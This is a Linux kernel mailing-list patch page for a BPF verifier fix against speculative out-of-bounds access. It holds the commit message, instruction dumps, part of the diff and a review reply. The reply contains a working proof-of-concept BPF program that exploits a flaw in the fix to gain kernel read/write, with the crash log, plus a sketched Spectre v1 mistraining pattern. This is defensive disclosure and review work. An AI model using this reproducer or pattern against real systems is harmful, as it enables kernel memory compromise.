[bpf,v3,8/9] bpf: prevent out of bounds speculation on pointer arithmetic

Message ID 20190102235835.3311-9-daniel@iogearbox.net
State Accepted
Delegated to: BPF Maintainers
Series
  • bpf fix to prevent oob under speculation

Commit Message

Daniel Borkmann Jan. 2, 2019, 11:58 p.m. UTC
Jann reported that the original commit back in b2157399cc98
("bpf: prevent out-of-bounds speculation") was not sufficient
to stop CPU from speculating out of bounds memory access:
While b2157399cc98 only focussed on masking array map access
for unprivileged users for tail calls and data access such
that the user provided index gets sanitized from BPF program
and syscall side, there is still a more generic form affected
from BPF programs that applies to most maps that hold user
data in relation to dynamic map access when dealing with
unknown scalars or "slow" known scalars as access offset, for
example:

  - Load a map value pointer into R6
  - Load an index into R7
  - Do a slow computation (e.g. with a memory dependency) that
    loads a limit into R8 (e.g. load the limit from a map for
    high latency, then mask it to make the verifier happy)
  - Exit if R7 >= R8 (mispredicted branch)
  - Load R0 = R6[R7]
  - Load R0 = R6[R0]

For unknown scalars there are two options in the BPF verifier
from which we could derive knowledge in order to guarantee
safe access to the memory: i) while the </>/<=/>= compare
variants won't allow us to derive any lower or upper bounds
for the unknown scalar that would make it safe to add to the
map value pointer, it is possible through ==/!= tests; ii)
another option is to transform the unknown scalar into a
known scalar, for example, through an ALU op combination such
as R &= <imm> followed by R |= <imm> or any similar
combination where the original information from the unknown
scalar is destroyed entirely, leaving R with a constant. The
initial slow load still precedes the latter ALU ops on that
register, so the CPU executes speculatively from that point.
Once we have the known scalar, any compare operation would
then work. A third option, involving only registers with
known scalars, could be crafted as described in [0]: a CPU
port (e.g. the Slow Int unit) is filled with many dependent
computations such that the subsequent condition depending on
their outcome has to wait for evaluation on its execution
port, thereby executing speculatively if the speculated code
can be scheduled on a different execution port; any other
form of mistraining as described in [1] works as well, for
example. Given this is not limited to unknown scalars, not
only map but also stack access is affected since both are
accessible to unprivileged users and could potentially be
used for out of bounds access under speculation.

In order to prevent any of these cases, the verifier is now
sanitizing pointer arithmetic on the offset such that any
out of bounds speculation is masked in a way where the
pointer arithmetic result in the destination register stays
unchanged, meaning the offset is masked to zero, similar to
the array_index_nospec() case. With regards to the
implementation, three options were considered: i) a new insn
for sanitation, ii) push/pop insns and sanitation as inlined
BPF, iii) reuse of the ax register and sanitation as inlined
BPF.

Option i) has the downside that we end up using reserved
bits in the opcode space, but also that we would require
each JIT to emit the masking as native arch opcodes, meaning
the mitigation would see slow adoption until everyone
eventually implements it, which is counter-productive.
Options ii) and iii) both have in common that a temporary
register is needed in order to implement the sanitation as
inlined BPF since we are not allowed to modify the source
register. While a push / pop insn in ii) would be useful to
have in any case, it once again requires that every JIT
implement it first. While possible, the amount of changes
needed would also be unsuitable for a -stable patch.
Therefore, the path which has fewer changes, fewer BPF
instructions for the mitigation and does not require
anything to be changed in the JITs is option iii), which
this work pursues. The ax register is already mapped to a
register in all JITs (modulo arm32 where it's mapped to
stack as various other BPF registers are) and so far used
only for constant blinding in JITs. It can be reused for
verifier rewrites under certain constraints. The
interpreter's tmp "register" has therefore been remapped
into extending the register set with a hidden ax register,
which is reused for a number of instructions that previously
needed a temporary variable internally (e.g. div, mod). This
allows for zero increase in stack space usage in the
interpreter, and enables (restricted) generic use in
rewrites otherwise, as long as such a patchlet does not make
use of these instructions. The sanitation mask is dynamic
and relative to the offset the map value or stack pointer
currently holds.

There are various cases that need to be taken into
consideration for the masking, e.g. such an operation could
look as follows: ptr += val, val += ptr, or ptr -= val.
Thus, the value to be sanitized could reside either in the
source or in the destination register, and the limit differs
depending on whether the ALU op is an addition or a
subtraction and on the currently known and bounded offset.
For addition, the limit is derived as follows:
limit := max_value_size - (smin_value + off); for
subtraction: limit := umax_value + off. This holds because
we do not allow any pointer arithmetic that would
temporarily go out of bounds or that involves an unknown
value with mixed signed bounds where it is unclear at
verification time whether the actual runtime value would be
negative or positive. For example, for a derived map value
pointer with a constant and bounded offset, the limit based
on smin_value works because the verifier requires that
statically analyzed arithmetic on the pointer must be in
bounds, and thus it checks whether the resulting
smin_value + off and umax_value + off are still within map
value bounds at the time of the arithmetic in addition to
the time of access. Similarly, for the case of stack access
we derive the limit as follows: MAX_BPF_STACK + off for
subtraction and -off for addition, where off :=
ptr_reg->off + ptr_reg->var_off.value. Subtraction is a
special case for the masking, which can come in the form of
ptr += -val, ptr -= -val, or ptr -= val. In the first two
cases, where we know that the value is negative, we need to
temporarily negate the value in order to do the sanitation
on a positive value, later swap the ALU op, and restore the
original source register if the value was in the source.
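
The limit derivation above can be sketched in plain C (an
illustrative, simplified model of the verifier's logic under
the stated bounds assumptions; the function names are
hypothetical, not the kernel's):

```c
#include <stdint.h>

#define MAX_BPF_STACK 512

/* Limit for "map_ptr += scalar": bytes between the pointer's
 * statically known minimum position and the end of the map value.
 */
static int64_t map_add_limit(uint32_t value_size, int64_t smin_value,
			     int32_t ptr_off)
{
	return (int64_t)value_size - (smin_value + ptr_off);
}

/* Limit for "map_ptr -= scalar": how far the pointer's statically
 * known maximum position sits above the start of the map value.
 */
static int64_t map_sub_limit(uint64_t umax_value, int32_t ptr_off)
{
	return (int64_t)umax_value + ptr_off;
}

/* For stack pointers, off := ptr_reg->off + ptr_reg->var_off.value
 * and is <= 0 since the stack grows down from the frame pointer.
 */
static int64_t stack_add_limit(int64_t off) { return -off; }
static int64_t stack_sub_limit(int64_t off) { return MAX_BPF_STACK + off; }
```

E.g. a pointer at the start of an 8 byte map value
(smin_value == 0, off == 0) may advance by at most 8 bytes,
and a stack pointer at fp-16 by at most 16 before crossing fp.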

The sanitation of pointer arithmetic alone is still not fully
sufficient as is, since a scenario like the following could
happen ...

  PTR += 0x1000 (e.g. K-based imm)
  PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON
  PTR += 0x1000
  PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON
  [...]

... which under speculation could end up as ...

  PTR += 0x1000
  PTR -= 0 [ truncated by mitigation ]
  PTR += 0x1000
  PTR -= 0 [ truncated by mitigation ]
  [...]

... and therefore still access out of bounds. To prevent such
a case, the verifier also analyzes safety for potential out
of bounds access under speculative execution, meaning it
also simulates pointer access under truncation. We therefore
"branch off" and push the current verification state after
the ALU operation with known 0 to the verification stack for
later analysis. Given the current path analysis succeeded,
it is likely that the one under speculation can be pruned.
In any case, it is also subject to the existing complexity
limits, and anything beyond this point will therefore be
rejected. In terms of pruning, it needs to be ensured that
the verification state from the speculative execution
simulation never prunes a non-speculative execution path;
therefore, we mark the verifier state accordingly at the
time of push_stack(). If the verifier detects out of bounds
access under speculative execution from one of the possible
paths that includes a truncation, it will reject such a
program.

Given we mask every reg-based pointer arithmetic for
unprivileged programs, we've been looking into how it could
affect real-world programs in terms of size increase. As the
majority of programs are targeted at privileged-only use
cases, we've unconditionally enabled the masking (with its
alu restrictions on top of it) for privileged programs for
the sake of testing, in order to check i) whether they get
rejected in their current form, and ii) by how much the
number of instructions and the size will increase. We've
tested this using Katran, Cilium and test_l4lb from the
kernel selftests: for Katran we've evaluated
balancer_kern.o, for Cilium bpf_lxc.o as well as an older
test object bpf_lxc_opt_-DUNKNOWN.o, and for l4lb we've used
test_l4lb.o as well as test_l4lb_noinline.o. We found that
none of the programs got rejected by the verifier with this
change, and that the impact is rather minimal to none.
balancer_kern.o had 13,904 bytes (1,738 insns) xlated and
7,797 bytes JITed before and after the change. Most complex
program in bpf_lxc.o had 30,544 bytes (3,817 insns) xlated
and 18,538 bytes JITed before and after and none of the other
tail call programs in bpf_lxc.o had any changes either. For
the older bpf_lxc_opt_-DUNKNOWN.o object we found a small
increase from 20,616 bytes (2,576 insns) and 12,536 bytes JITed
before to 20,664 bytes (2,582 insns) and 12,558 bytes JITed
after the change. Other programs from that object file had
similar small increases. test_l4lb.o had no change and
remained at 6,544 bytes (817 insns) xlated and 3,401 bytes
JITed, and test_l4lb_noinline.o stayed constant at 5,080
bytes (634 insns) xlated and 3,313 bytes JITed. This can be
explained by the fact that LLVM typically optimizes stack
based pointer arithmetic by using K-based operations, and
that dynamic map access is not used overly frequently.
However, in the future we may decide to optimize the
algorithm further under known guarantees from branch and
value speculation. The latter also seems unclear in terms of
the prediction heuristics that today's CPUs apply, as well
as whether there could be collisions in e.g. the predictor's
Value History/Pattern Table that trigger out of bounds
access; thus masking is performed unconditionally at this
point but could be subject to relaxation later on. We were
generally also brainstorming various other approaches for
mitigation, but the blocker was always the lack of available
registers at runtime and/or the overhead of runtime tracking
of limits belonging to a specific pointer. Thus, we found
this to be minimally intrusive under the given constraints.

With that in place, a simple example of sanitized access for
an unprivileged load at post-verification time looks as follows:

  # bpftool prog dump xlated id 282
  [...]
  28: (79) r1 = *(u64 *)(r7 +0)
  29: (79) r2 = *(u64 *)(r7 +8)
  30: (57) r1 &= 15
  31: (79) r3 = *(u64 *)(r0 +4608)
  32: (57) r3 &= 1
  33: (47) r3 |= 1
  34: (2d) if r2 > r3 goto pc+19
  35: (b4) (u32) r11 = (u32) 20479  |
  36: (1f) r11 -= r2                | Dynamic sanitation for pointer
  37: (4f) r11 |= r2                | arithmetic with registers
  38: (87) r11 = -r11               | containing bounded or known
  39: (c7) r11 s>>= 63              | scalars in order to prevent
  40: (5f) r11 &= r2                | out of bounds speculation.
  41: (0f) r4 += r11                |
  42: (71) r4 = *(u8 *)(r4 +0)
  43: (6f) r4 <<= r1
  [...]
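
The seven rewrite insns above (r11 being the hidden ax
register) form a branchless range check. A C model of their
effect, assuming the verifier-chosen alu_limit is already in
place (an illustrative sketch, not the kernel's code), could
look as follows:

```c
#include <stdint.h>

/* Models the inlined BPF sequence
 *   r11 = limit; r11 -= off; r11 |= off; r11 = -r11;
 *   r11 s>>= 63; r11 &= off
 * emitted by the verifier: for an offset within [0, limit] the
 * arithmetic shift produces an all-ones mask and the offset passes
 * through unchanged; an offset beyond the limit (or with the sign
 * bit set) yields a zero mask, so the offset collapses to 0 and the
 * subsequent pointer addition becomes a no-op under speculation.
 */
static uint64_t masked_offset(uint64_t off, uint64_t limit)
{
	uint64_t ax = limit;

	ax -= off;                          /* BPF_SUB              */
	ax |= off;                          /* BPF_OR               */
	ax = -ax;                           /* BPF_NEG              */
	ax = (uint64_t)((int64_t)ax >> 63); /* BPF_ARSH: 0 or ~0ULL */
	return off & ax;                    /* BPF_AND              */
}
```

With the limit 20479 from the dump above, an in-bounds offset
such as 5 passes through unchanged, while a value like
0x13371337 is truncated to 0, so r4 += r11 then leaves the
pointer where it was.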

For the case where the scalar sits in the destination register
as opposed to the source register, the following code is emitted
for the above example:

  [...]
  16: (b4) (u32) r11 = (u32) 20479
  17: (1f) r11 -= r2
  18: (4f) r11 |= r2
  19: (87) r11 = -r11
  20: (c7) r11 s>>= 63
  21: (5f) r2 &= r11
  22: (0f) r2 += r0
  23: (61) r0 = *(u32 *)(r2 +0)
  [...]

JIT blinding example with non-conflicting use of r10:

  [...]
   d5:	je     0x0000000000000106    _
   d7:	mov    0x0(%rax),%edi       |
   da:	mov    $0xf153246,%r10d     | Index load from map value and
   e0:	xor    $0xf153259,%r10      | (const blinded) mask with 0x1f.
   e7:	and    %r10,%rdi            |_
   ea:	mov    $0x2f,%r10d          |
   f0:	sub    %rdi,%r10            | Sanitized addition. Both use r10
   f3:	or     %rdi,%r10            | but do not interfere with each
   f6:	neg    %r10                 | other. (Neither do these instructions
   f9:	sar    $0x3f,%r10           | interfere with the use of ax as temp
   fd:	and    %r10,%rdi            | in interpreter.)
  100:	add    %rax,%rdi            |_
  103:	mov    0x0(%rdi),%eax
 [...]

Tested that it fixes Jann's reproducer, and also checked that the test_verifier
and test_progs suites run successfully with the interpreter, JIT, and JIT with
hardening enabled on x86-64 and arm64.

  [0] Speculose: Analyzing the Security Implications of Speculative
      Execution in CPUs, Giorgi Maisuradze and Christian Rossow,
      https://arxiv.org/pdf/1801.04084.pdf

  [1] A Systematic Evaluation of Transient Execution Attacks and
      Defenses, Claudio Canella, Jo Van Bulck, Michael Schwarz,
      Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens,
      Dmitry Evtyushkin, Daniel Gruss,
      https://arxiv.org/pdf/1811.05441.pdf

Fixes: b2157399cc98 ("bpf: prevent out-of-bounds speculation")
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
---
 include/linux/bpf_verifier.h |  10 +++
 kernel/bpf/verifier.c        | 185 +++++++++++++++++++++++++++++++++++++++++--
 2 files changed, 189 insertions(+), 6 deletions(-)

Comments

Jann Horn Jan. 3, 2019, 9:13 p.m. UTC | #1
Hi!

Sorry about the extremely slow reply, I was on vacation over the
holidays and only got back today.

On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@iogearbox.net> wrote:
> Jann reported that the original commit back in b2157399cc98
> ("bpf: prevent out-of-bounds speculation") was not sufficient
> to stop CPU from speculating out of bounds memory access:
> While b2157399cc98 only focussed on masking array map access
> for unprivileged users for tail calls and data access such
> that the user provided index gets sanitized from BPF program
> and syscall side, there is still a more generic form affected
> from BPF programs that applies to most maps that hold user
> data in relation to dynamic map access when dealing with
> unknown scalars or "slow" known scalars as access offset, for
> example:
[...]
> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
> +                           struct bpf_insn *insn,
> +                           const struct bpf_reg_state *ptr_reg,
> +                           struct bpf_reg_state *dst_reg,
> +                           bool off_is_neg)
> +{
[...]
> +
> +       /* If we arrived here from different branches with different
> +        * limits to sanitize, then this won't work.
> +        */
> +       if (aux->alu_state &&
> +           (aux->alu_state != alu_state ||
> +            aux->alu_limit != alu_limit))
> +               return -EACCES;

This code path doesn't get triggered in the case where the same
ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg
+= reg". This leads to kernel read/write because the code intended to
ensure safety of the "ptr += reg" case in speculative execution ends
up clobbering the addend in the "numeric_reg += reg" case:

source code:
=============
int main(void) {
  int my_map = array_create(8, 30);
  array_set(my_map, 0, 1);
  struct bpf_insn insns[] = {
    // load map value pointer into r0 and r2
    BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // load some number from the map into r1
    BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),

    // branch A
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
    BPF_MOV64_IMM(BPF_REG_3, 0),
    BPF_JMP_A(2),

    // branch B
    BPF_MOV64_IMM(BPF_REG_2, 0),
    BPF_MOV64_IMM(BPF_REG_3, 0x100000),

    // *** COMMON INSTRUCTION ***
    BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),

    // branch A
    BPF_JMP_A(4),

    // branch B
    BPF_MOV64_IMM(BPF_REG_0, 0x13371337),
    // verifier-confused branch: verifier follows fall-through, runtime follows jump
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // fake-dead code; targeted from branch A to prevent dead code sanitization
    BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
  trigger_proc(sock_fd);
}
=============

verifier output:
=============
0: (18) r1 = 0x0
2: (bf) r2 = r10
3: (07) r2 += -16
4: (7a) *(u64 *)(r10 -16) = 0
5: (85) call bpf_map_lookup_elem#1
6: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
7: (95) exit

from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1
fp-16=mmmmmmmm
8: (71) r1 = *(u8 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
9: (55) if r1 != 0x0 goto pc+3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
10: (bf) r2 = r0
11: (b7) r3 = 0
12: (05) goto pc+2
15: (0f) r2 += r3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1
fp-16=mmmmmmmm
16: (55) if r1 != 0x0 goto pc+1
17: (05) goto pc+4
22: (71) r0 = *(u8 *)(r0 +0)
 R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1
fp-16=mmmmmmmm
23: (b7) r0 = 0
24: (95) exit

from 15 to 16 (speculative execution): safe

from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1
fp-16=mmmmmmmm
13: (b7) r2 = 0
14: (b7) r3 = 1048576
15: (0f) r2 += r3
16: (55) if r1 != 0x0 goto pc+1
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576
R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
17: (05) goto pc+4
22: safe

from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576
R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
18: (b7) r0 = 322376503
19: (55) if r2 != 0x100000 goto pc+2
20: (b7) r0 = 0
21: (95) exit
processed 29 insns (limit 131072), stack depth 16
=============

dmesg:
=============
[ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164
from=test pid=2185
[ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48
83 ed 28 48
[ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c
89 7d 18 31
[ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81
88 ff ff 48
[ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00
00 00 48 81
[ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e
73 0c 83 e0
[ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0
48 83 f8 00
[ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b
75 10 4c 8b
[ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78
00 48 83 ff
[ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6
ba 00 00 10
[ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09
d2 49 f7 da
[ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83
ff 00 75 02
[ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00
10 00 75 04
[ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
[ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
[ 9948.481562] #PF error: [normal kernel read fault]
[ 9948.483878] PGD 0 P4D 0
[ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
[ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
[ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.10.2-1 04/01/2014
[ 9948.494912] RIP: 0010:0xffffffffc01602f3
[ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6
48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31
c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc
cc cc
[ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
[ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
[ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
[ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
[ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
[ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
[ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000)
knlGS:0000000000000000
[ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
[ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 9948.542581] Call Trace:
[ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
[ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
[ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
[ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
[ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
[ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
[ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
[ 9948.558856]  ? unix_stream_connect+0x980/0x980
[ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
[ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
[ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.568463]  ? unix_stream_connect+0x980/0x980
[ 9948.570397]  ? sock_sendmsg+0x6d/0x80
[ 9948.571948]  ? sock_write_iter+0x121/0x1c0
[ 9948.573678]  ? sock_sendmsg+0x80/0x80
[ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
[ 9948.576958]  ? iov_iter_init+0x86/0xc0
[ 9948.578395]  ? __vfs_write+0x294/0x3b0
[ 9948.579782]  ? kernel_read+0xa0/0xa0
[ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
[ 9948.582919]  ? vfs_write+0xe7/0x230
[ 9948.584228]  ? ksys_write+0xa1/0x120
[ 9948.585559]  ? __ia32_sys_read+0x50/0x50
[ 9948.587174]  ? do_syscall_64+0x73/0x160
[ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
[ 9948.593654] CR2: 0000000013371337
[ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
=============



Aside from that, I also think that the pruning of "dead code" probably
still permits v1 speculative execution attacks when code vaguely like
the following is encountered, if it is possible to convince the CPU to
mispredict the second branch, but I haven't tested that so far:

R0 = <slow map value, known to be 0>;
R1 = <fast map value>;
if (R1 != R0) { // mispredicted
  return 0;
}
R3 = <a map value pointer>;
R2 = <arbitrary 64-bit number>;
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];

To convince the CPU to predict the second branch the way you want, you
could probably add another code path that jumps in front of the branch
with both R2 and R3 already containing valid pointers. Something like
this:

if (<some map value>) {
  R0 = <slow map value, known to be 0>;
  R1 = <fast map value>;
  if (R1 != R0) { // mispredicted
    return 0;
  }
  R3 = <a map value pointer>;
  R2 = <arbitrary 64-bit number>;
} else {
  R3 = <a map value pointer>;
  R2 = <arbitrary 64-bit number>;
  R1 = 1;
}
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];

Daniel Borkmann Jan. 3, 2019, 11:22 p.m. UTC | #2
Hi Jann,

On 01/03/2019 10:13 PM, Jann Horn wrote:
> Hi!
> 
> Sorry about the extremely slow reply, I was on vacation over the
> holidays and only got back today.
> 
> On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@iogearbox.net> wrote:
>> Jann reported that the original commit back in b2157399cc98
>> ("bpf: prevent out-of-bounds speculation") was not sufficient
>> to stop CPU from speculating out of bounds memory access:
>> While b2157399cc98 only focussed on masking array map access
>> for unprivileged users for tail calls and data access such
>> that the user provided index gets sanitized from BPF program
>> and syscall side, there is still a more generic form affected
>> from BPF programs that applies to most maps that hold user
>> data in relation to dynamic map access when dealing with
>> unknown scalars or "slow" known scalars as access offset, for
>> example:
> [...]
>> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
>> +                           struct bpf_insn *insn,
>> +                           const struct bpf_reg_state *ptr_reg,
>> +                           struct bpf_reg_state *dst_reg,
>> +                           bool off_is_neg)
>> +{
> [...]
>> +
>> +       /* If we arrived here from different branches with different
>> +        * limits to sanitize, then this won't work.
>> +        */
>> +       if (aux->alu_state &&
>> +           (aux->alu_state != alu_state ||
>> +            aux->alu_limit != alu_limit))
>> +               return -EACCES;
> 
> This code path doesn't get triggered in the case where the same
> ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg
> += reg". This leads to kernel read/write because the code intended to
> ensure safety of the "ptr += reg" case in speculative execution ends
> up clobbering the addend in the "numeric_reg += reg" case:
> [...]

Good point, thanks for catching this scenario! I'll get this fixed in
order to reject such programs.

> Aside from that, I also think that the pruning of "dead code" probably
> still permits v1 speculative execution attacks when code vaguely like
> the following is encountered, if it is possible to convince the CPU to
> mispredict the second branch, but I haven't tested that so far:
> 
> R0 = <slow map value, known to be 0>;
> R1 = <fast map value>;
> if (R1 != R0) { // mispredicted
>   return 0;
> }
> R3 = <a map value pointer>;
> R2 = <arbitrary 64-bit number>;
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];
> 
> To convince the CPU to predict the second branch the way you want, you
> could probably add another code path that jumps in front of the branch
> with both R2 and R3 already containing valid pointers. Something like
> this:
> 
> if (<some map value>) {
>   R0 = <slow map value, known to be 0>;
>   R1 = <fast map value>;
>   if (R1 != R0) { // mispredicted
>     return 0;
>   }
>   R3 = <a map value pointer>;
>   R2 = <arbitrary 64-bit number>;
> } else {
>   R3 = <a map value pointer>;
>   R2 = <arbitrary 64-bit number>;
>   R1 = 1;
> }
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];

Thanks, I'll look into evaluating this case as well after the fix.

Best,
Daniel

Patch
diff mbox series

diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
index 3f84f3e..27b7494 100644
--- a/include/linux/bpf_verifier.h
+++ b/include/linux/bpf_verifier.h
@@ -148,6 +148,7 @@  struct bpf_verifier_state {
 	/* call stack tracking */
 	struct bpf_func_state *frame[MAX_CALL_FRAMES];
 	u32 curframe;
+	bool speculative;
 };
 
 #define bpf_get_spilled_reg(slot, frame)				\
@@ -167,15 +168,24 @@  struct bpf_verifier_state_list {
 	struct bpf_verifier_state_list *next;
 };
 
+/* Possible states for alu_state member. */
+#define BPF_ALU_SANITIZE_SRC		1U
+#define BPF_ALU_SANITIZE_DST		2U
+#define BPF_ALU_NEG_VALUE		(1U << 2)
+#define BPF_ALU_SANITIZE		(BPF_ALU_SANITIZE_SRC | \
+					 BPF_ALU_SANITIZE_DST)
+
 struct bpf_insn_aux_data {
 	union {
 		enum bpf_reg_type ptr_type;	/* pointer type for load/store insns */
 		unsigned long map_state;	/* pointer/poison value for maps */
 		s32 call_imm;			/* saved imm field of call insn */
+		u32 alu_limit;			/* limit for add/sub register with pointer */
 	};
 	int ctx_field_size; /* the ctx field size for load insn, maybe 0 */
 	int sanitize_stack_off; /* stack slot to be cleared */
 	bool seen; /* this insn was processed by the verifier */
+	u8 alu_state; /* used in combination with alu_limit */
 };
 
 #define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 8e5da1c..f6bc62a 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -710,6 +710,7 @@  static int copy_verifier_state(struct bpf_verifier_state *dst_state,
 		free_func_state(dst_state->frame[i]);
 		dst_state->frame[i] = NULL;
 	}
+	dst_state->speculative = src->speculative;
 	dst_state->curframe = src->curframe;
 	for (i = 0; i <= src->curframe; i++) {
 		dst = dst_state->frame[i];
@@ -754,7 +755,8 @@  static int pop_stack(struct bpf_verifier_env *env, int *prev_insn_idx,
 }
 
 static struct bpf_verifier_state *push_stack(struct bpf_verifier_env *env,
-					     int insn_idx, int prev_insn_idx)
+					     int insn_idx, int prev_insn_idx,
+					     bool speculative)
 {
 	struct bpf_verifier_state *cur = env->cur_state;
 	struct bpf_verifier_stack_elem *elem;
@@ -772,6 +774,7 @@  static struct bpf_verifier_state *push_stack(struct bpf_verifier_env *env,
 	err = copy_verifier_state(&elem->st, cur);
 	if (err)
 		goto err;
